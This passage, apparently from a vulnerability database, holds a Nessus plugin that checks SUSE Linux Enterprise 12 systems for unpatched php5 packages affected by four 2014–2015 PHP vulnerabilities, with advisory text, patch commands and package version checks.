CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.37,\n 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. 
NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bnc#910659).\n\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component\n in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x\n through 5.6.4, when mmap is used to read a .php file,\n did not properly consider the mapping's length during\n processing of an invalid file that begins with a #\n character and lacks a newline character, which caused an\n out-of-bounds read and might (1) allow remote attackers\n to obtain sensitive information from php-cgi process\n memory by leveraging the ability to upload a .php file\n or (2) trigger unexpected code execution if a valid PHP\n script is present in memory locations adjacent to the\n mapping (bnc#911664).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP before 5.4.37, 5.5.x before\n 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers\n to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bnc#914690).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.36,\n 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bnc#910659).\n\nAdditionally a fix was included that protects against a possible NULL\npointer use (bnc#910659).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=907519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=911664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=914690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8142/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9427/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0231/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0232/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150365-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?458c2003\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-94=1\n\nSUSE Linux Enterprise Module for Web Scripting 12 :\n\nzypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2015-94=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debugsource-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 
reference:\"php5-enchant-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-5.5.14-11.3\")) flag++;\nif 
(rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 
reference:\"php5-pgsql-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 
reference:\"php5-sysvshm-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-debuginfo-5.5.14-11.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:20:52", "bulletinFamily": "scanner", "description": "php5 was updated to fix five security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.37,\n 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bnc#910659).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP before 5.4.37, 5.5.x before\n 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers\n to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bnc#914690).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.36,\n 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bnc#910659).\n\n - CVE-2014-9427: 